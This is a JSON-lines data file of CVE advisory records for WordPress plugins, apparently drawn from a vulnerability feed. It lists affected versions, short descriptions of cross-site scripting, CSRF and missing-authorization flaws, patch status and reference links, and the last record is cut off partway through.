{"CVE_ID":"CVE-2025-4943","slug":"lastudio-element-kit","versionImpact":"1.5.2","description":"The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018data-lakit-element-link\u2019 parameter in all versions up to, and including, 1.5.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/wrapper-links.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lastudio-element-kit\\\/trunk\\\/assets\\\/js\\\/addons\\\/wrapper-links.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3302784\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/lastudio-element-kit\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5822b9-7fd0-4c39-a298-70d0debcc136?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c5822b9-7fd0-4c39-a298-70d0debcc136?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23977","slug":"heateor-social-comments","versionImpact":"1.6.1","description":"Auth. (contributor+) Stored Cross-Site Scripting (XSS) vulnerability in Team Heateor WordPress Social Comments Plugin for Vkontakte Comments and Disqus Comments plugin <= 1.6.1 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-comments\\\/wordpress-vkontakte-comments-and-disqus-comments-plugin-1-6-1-cross-site-scripting-xss?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/heateor-social-comments\\\/wordpress-vkontakte-comments-and-disqus-comments-plugin-1-6-1-cross-site-scripting-xss?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6197","slug":"audio-merchant","versionImpact":"5.0.4","description":"The Audio Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.4. This is due to missing or incorrect nonce validation on the audio_merchant_save_settings function. This makes it possible for unauthenticated attackers to modify the plugin's settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7911337-57fa-4268-8366-d37ff13fae86?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7911337-57fa-4268-8366-d37ff13fae86?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L951\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L951\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1070","slug":"so-widgets-bundle","versionImpact":"1.58.2","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the features attribute in all versions up to, and including, 1.58.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8b6dafb-7b2f-4459-95bd-eb7e147a4466?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/widgets\\\/features\\\/tpl\\\/default.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/widgets\\\/features\\\/tpl\\\/default.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0613","slug":"delete-custom-fields","versionImpact":"0.3.1","description":"The Delete Custom Fields plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.3.1. This is due to missing or incorrect nonce validation on the ajax_delete_field() function. This makes it possible for unauthenticated attackers to delete arbitrary post meta data via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c13ba1df-25fa-4cc8-9745-2d6f6168788a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-custom-fields\\\/trunk\\\/delete-custom-fields.php#L357\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/delete-custom-fields\\\/trunk\\\/delete-custom-fields.php#L357\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3671","slug":"print-o-matic","versionImpact":"2.1.10","description":"The Print-O-Matic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'print-me' shortcode in all versions up to, and including, 2.1.10 due to insufficient input sanitization and output escaping on user supplied attributes such as 'tag'. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10ea8f3a-35d6-494e-90f6-9165320cf99c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10ea8f3a-35d6-494e-90f6-9165320cf99c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/print-o-matic\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/print-o-matic\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4758","slug":"muslim-prayer-time-bd","versionImpact":"2.4","description":"The Muslim Prayer Time BD WordPress plugin through 2.4 does not have CSRF check in place when reseting its settings, which could allow attackers to make a logged in admin reset them via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64ec57a5-35d8-4c69-bdba-096c2245a0db\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/64ec57a5-35d8-4c69-bdba-096c2245a0db\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9613","slug":"formfacade","versionImpact":"1.3.6","description":"The FormFacade \u2013 WordPress plugin for Google Forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'userId' and 'publishId' parameters in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4a00ad0-5761-4fb7-a4e6-cb213cf32cb2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e4a00ad0-5761-4fb7-a4e6-cb213cf32cb2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formfacade\\\/trunk\\\/formfacade.php#L173\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/formfacade\\\/trunk\\\/formfacade.php#L173\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11888","slug":"ider-login","versionImpact":"2.1","description":"The IDer Login for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ider_login_button' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ider-login\\\/trunk\\\/includes\\\/IDER_Shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ider-login\\\/trunk\\\/includes\\\/IDER_Shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ider-login\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ider-login\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de602cf8-cc02-4459-aa23-5d8236048bca?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de602cf8-cc02-4459-aa23-5d8236048bca?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12176","slug":"wordlift","versionImpact":"3.54.0","description":"The WordLift \u2013 AI powered SEO \u2013 Schema plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the 'wl_config_plugin' AJAX action in all versions up to, and including, 3.54.0. This makes it possible for unauthenticated attackers to update the plugin's settings.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordlift\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wordlift\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca6bdde6-f381-4ccb-8984-519cf9aca0b1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca6bdde6-f381-4ccb-8984-519cf9aca0b1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12598","slug":"mybookprogress","versionImpact":"1.0.8","description":"The MyBookProgress by Stormhill Media plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018book\u2019 parameter in all versions up to, and including, 1.0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mybookprogress\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mybookprogress\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b20a11c1-9aa0-4f5d-af3d-89fb9bf4e1d0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b20a11c1-9aa0-4f5d-af3d-89fb9bf4e1d0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12872","slug":"zalomeni","versionImpact":"1.5","description":"The Zalomen\u00ed WordPress plugin through 1.5 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a8a706c6-7f0f-4148-9f6f-40c0ca95dd9a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3661","slug":"sb-chart-block","versionImpact":"1.2.6","description":"The SB Chart block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018className\u2019 parameter in all versions up to, and including, 1.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-chart-block\\\/trunk\\\/sb-chart-block.php#L104\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sb-chart-block\\\/trunk\\\/sb-chart-block.php#L104\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276462\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3276462\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sb-chart-block\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sb-chart-block\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6afe4b6-c38c-46fa-82d5-95cb35c2c30f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6afe4b6-c38c-46fa-82d5-95cb35c2c30f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5259","slug":"minimal-share-buttons","versionImpact":"1.7.3","description":"The Minimal Share Buttons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 parameter in all versions up to, and including, 1.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-share-buttons\\\/trunk\\\/inc\\\/class-minimal-share-buttons.php#L67\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/minimal-share-buttons\\\/trunk\\\/inc\\\/class-minimal-share-buttons.php#L67\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3302704%40minimal-share-buttons&old=3074272%40minimal-share-buttons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3302704%40minimal-share-buttons&old=3074272%40minimal-share-buttons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/minimal-share-buttons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/minimal-share-buttons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac2ac7a-4cb5-4051-bec7-a22693c50915?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7ac2ac7a-4cb5-4051-bec7-a22693c50915?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7845","slug":"stratum","versionImpact":"1.6.0","description":"The Stratum \u2013 Elementor Widgets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Advanced Google Maps and Image Hotspot widgets in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.6.0\\\/includes\\\/templates\\\/image-hotspot.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stratum\\\/tags\\\/1.6.0\\\/includes\\\/templates\\\/image-hotspot.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335410\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3335410\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stratum\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stratum\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8d9f6ba-1c41-4933-8eb2-8f27b9e87574?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8d9f6ba-1c41-4933-8eb2-8f27b9e87574?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-23878","slug":"wp-google-map-plugin","versionImpact":"4.3.9","description":"Auth. (editor+) Stored Cross-Site Scripting (XSS) vulnerability in flippercode WordPress Plugin for Google Maps \u2013 WP MAPS plugin <= 4.3.9 versions.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wordpress-plugin-for-google-maps-wp-maps-plugin-4-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-google-map-plugin\\\/wordpress-wordpress-plugin-for-google-maps-wp-maps-plugin-4-3-9-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6196","slug":"audio-merchant","versionImpact":"5.0.4","description":"The Audio Merchant plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.4. This is due to missing or incorrect nonce validation on the function audio_merchant_add_audio_file function. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06513dfe-f263-48b7-ba01-2c205247095b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/06513dfe-f263-48b7-ba01-2c205247095b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L1298\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/audio-merchant\\\/trunk\\\/audio-merchant.php#L1298\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1058","slug":"so-widgets-bundle","versionImpact":"1.58.3","description":"The SiteOrigin Widgets Bundle plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the onclick parameter in all versions up to, and including, 1.58.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 1.58.3 offers a partial fix.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ffeb766f-3684-4eec-bacb-bbf0d434aba0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.2\\\/widgets\\\/button\\\/tpl\\\/default.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.2\\\/widgets\\\/button\\\/tpl\\\/default.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3031864%40so-widgets-bundle%2Ftrunk&old=3027675%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.3\\\/base\\\/base.php#L404\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/so-widgets-bundle\\\/tags\\\/1.58.3\\\/base\\\/base.php#L404\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3033967%40so-widgets-bundle%2Ftrunk&old=3031864%40so-widgets-bundle%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3666","slug":"opal-estate-pro","versionImpact":"1.7.6","description":"The Opal Estate Pro \u2013 Property Management and Submission plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the agent latitude and longitude parameters in all versions up to, and including, 1.7.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d5d58f-913a-4a26-8b2a-bfdd08033993?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c4d5d58f-913a-4a26-8b2a-bfdd08033993?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opal-estate-pro\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/opal-estate-pro\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3633","slug":"webp-svg-support","versionImpact":"1.4.0","description":"The WebP & SVG Support WordPress plugin through 1.4.0 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e0baffb-7ab8-4c17-aa2a-7f28a0be1a41\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2e0baffb-7ab8-4c17-aa2a-7f28a0be1a41\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7301","slug":"wp-file-upload","versionImpact":"4.24.8","description":"The WordPress File Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 4.24.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2b16b9c-48c7-4370-839b-696797ff2101?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e2b16b9c-48c7-4370-839b-696797ff2101?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_io.php#L176\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_io.php#L176\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-upload\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-file-upload\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_security.php#L50\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/tags\\\/4.24.8\\\/lib\\\/wfu_security.php#L50\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136025\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3136025\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10728","slug":"ultimate-post","versionImpact":"4.1.16","description":"The Post Grid Gutenberg Blocks and WordPress Blog Plugin \u2013 PostX plugin for WordPress is vulnerable to unauthorized plugin installation\/activation due to a missing capability check on the 'install_required_plugin_callback' function in all versions up to, and including, 4.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install and activate arbitrary plugins which can be leveraged to achieve remote code execution if another vulnerable plugin is installed and activated.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/076f36fb-c2fb-43e0-a027-1351d3995489?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/076f36fb-c2fb-43e0-a027-1351d3995489?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Importer.php#L94\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Importer.php#L94\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Initialization.php#L330\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-post\\\/tags\\\/4.1.16\\\/classes\\\/Initialization.php#L330\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ultimate-post\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3188636\\\/ultimate-post\\\/trunk\\\/classes\\\/Im